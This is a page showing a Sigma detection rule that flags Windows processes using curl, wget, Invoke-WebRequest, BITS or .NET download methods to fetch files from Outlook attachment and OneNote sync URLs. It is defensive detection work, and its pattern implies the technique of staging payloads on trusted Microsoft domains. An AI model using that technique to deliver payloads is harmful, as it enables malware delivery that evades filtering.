Suspicious Download from Office Domain
Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents
Sigma rule (View on GitHub)
1title: Suspicious Download from Office Domain
2id: 00d49ed5-4491-4271-a8db-650a4ef6f8c1
3status: test
4description: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents
5references:
6 - https://twitter.com/an0n_r0/status/1474698356635193346?s=12
7 - https://twitter.com/mrd0x/status/1475085452784844803?s=12
8author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
9date: 2021-12-27
10modified: 2022-08-02
11tags:
12 - attack.command-and-control
13 - attack.resource-development
14 - attack.t1105
15 - attack.t1608
16logsource:
17 product: windows
18 category: process_creation
19detection:
20 selection_download:
21 - Image|endswith:
22 - '\curl.exe'
23 - '\wget.exe'
24 - CommandLine|contains:
25 - 'Invoke-WebRequest'
26 - 'iwr '
27 - 'curl '
28 - 'wget '
29 - 'Start-BitsTransfer'
30 - '.DownloadFile('
31 - '.DownloadString('
32 selection_domains:
33 CommandLine|contains:
34 - 'https://attachment.outlook.live.net/owa/'
35 - 'https://onenoteonlinesync.onenote.com/onenoteonlinesync/'
36 condition: all of selection_*
37falsepositives:
38 - Scripts or tools that download attachments from these domains (OneNote, Outlook 365)
39level: high
References
Related rules
- Remote File Copy
- Suspicious Deno File Written from Remote Source
- Hidden Flag Set On File/Directory Via Chflags - MacOS
- Insensitive Subfolder Search Via Findstr.EXE
- Remote File Download Via Findstr.EXE